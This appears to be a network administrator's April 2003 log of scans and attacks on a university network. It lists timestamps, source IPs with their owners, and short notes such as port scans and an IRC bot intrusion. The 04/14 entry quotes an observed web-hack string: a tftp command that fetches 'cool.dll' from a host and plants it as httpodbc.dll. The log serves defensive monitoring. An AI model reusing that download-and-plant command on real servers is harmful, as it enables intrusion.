*SHORT* summary of some of the attacks against us for Apr. 2003

Just too many scans and not enough time to keep the list up all the time, so some of the more interesting scans, or 1-day samples, are here.

year - time EASTERN  source_ip[:port] (dns name, if any)  attack/scan/notes

2003/04/01-06:38:13.04 210.23.211.52 (Pacific Internet PH,Dialup Clients,PH) web server attacks
2003/04/01-06:51:50.79 61.147.248.229 (CHINANET jiangsu province network) web server attacks
2003/04/01-06:54:52.38 218.25.25.92 (CHINANET liaoning province network) web server attacks
2003/04/01-06:55:57.43 200.84.180.231 (CANTV Servicios, Venezuela) popup msg sent to pc
2003/04/01-06:56:02.92 200.72.50.99 (somewhere in CHILE) popup msg sent to pc
2003/04/01-07:26:38.71 202.175.51.134 (EPower Integrated Solutions Limited,MO) telnet buff overflow to condor as root
2003/04/01-10:06:30.77 200.168.140.116 (200-168-140-116.dsl.telesp.net.br) popup msg sent to pc
2003/04/01-13:14:51.35 213.194.120.253 (ns.turksystems.net) scannet for ports 1080,8080,80,3128
2003/04/01-14:57:27.15 207.188.234.141 (8d.eabccf.client.atlantech.net) scannet for port 1433
2003/04/01-15:08:53.21 195.133.68.1 (Moscow Center Continuous Mathematical Education,RU) 1. seems to be on local net.
2003/04/01-15:08:53.21 195.133.68.1 (Moscow Center Continuous Mathematical Education,RU) connect to 195.133.68.15
2003/04/01-15:25:51.45 200.161.5.205 (200-161-5-205.dsl.telesp.net.br) popup msg sent to pc
2003/04/01-15:53:25.00 210.22.141.85 (shanghai city,CN) scan web servers for ports 80,8080,1080,3128
2003/04/01-17:17:56.57 80.13.61.81 (ALille-107-1-9-81.abo.wanadoo.fr) scannet for port 1433
2003/04/01-17:17:57.16 80.13.61.81 (ALille-107-1-9-81.abo.wanadoo.fr) scannet ICMP superscan echo
2003/04/01-18:37:42.55 129.194.124.47 (University of Geneva-Ctr,CH) scannet for ports 80,57,21
2003/04/01-18:41:36.31 148.223.19.154 (customer-148-223-19-154.uninet.net.mx) scannet for ports 57,1433
2003/04/01-19:27:24.51 61.147.60.65 (CHINANET jiangsu province yancheng city network) probe 132.235.1.35 : 21
2003/04/01-19:59:13.57 61.147.60.196 (CHINANET jiangsu province yancheng city network) probe 132.235.1.35 : 21
2003/04/01-20:27:46.21 212.21.103.142 (RapidHost Ltd,Part of the Network-i CIDR block,GB) scannet for port 4000
2003/04/01-23:49:38.67 61.177.251.125 (CHINANET jiangsu province network) web server attacks thru 04/02-05:11:39.16
2003/04/02-01:05:41.13 68.165.32.93 (h-68-165-32-93.LSANCA54.covad.net) scannet for port 21
2003/04/02-04:21:34.44 210.125.222.16 (DAEJEON Public Health University,KR) scannet for ports 3072,1024
2003/04/02-05:04:11.41 216.39.48.181 (trek19.sv.av.com) attack web servers
2003/04/02-05:27:40.84 81.53.187.144 (APuteaux-116-1-6-144.abo.wanadoo.fr) scannet for ports 57,1433
2003/04/02-06:00:00.00 0.0.0.0 and as a note, the following are web server attacks (not scans) for 24 hrs on 1 building.
2003/04/02-06:00:00.00 0.0.0.0 and note that the times are off by 4 hours.
2003/04/03-16:24:31.32 132.235.198.49 (dhcp-198-049.cns.ohiou.edu) scannet for ports 135 445
2003/04/03-17:04:11.71 193.41.67.50 (green-50.bgnet.bg) portscan 132.235.1.1 from 1 - 700,3000-3374,several 8K ports,
2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 1. start of large number of UDP packets to 132.235.1.2 (no-one logged on)
2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 2. from multiple ips to port 22321 (all length 10) till 02:40 contains W1W!
2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 3. and to 7674 (seemingly 1 english word as data). till 03:31 or so.
2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 4. perhaps p2p called harbors? home.postech.ac.kr/~elkarian/cs499/pds/final.ppt
2003/04/10-13:40:12.64 67.86.133.155 (ool-4356859b.dyn.optonline.net) hack into 132.235.18.133 to set up irc bot
2003/04/14-04:06:47.13 218.92.212.80 (CHINANET jiangsu province) web hack as tftp%20-i%20132.235.66.74%20GET%20cool.dll%20c:\httpodbc.dll
2003/04/14-21:48:29.34 200.38.57.226 (Direct Tech, S.A. de C.V.,MX) portscan the entire net, 166 ports per ip
2003/04/24-14:17:05.57 132.235.44.141 (bios name LIBRARY_MILCIRC) portscan net on ports 139,445,21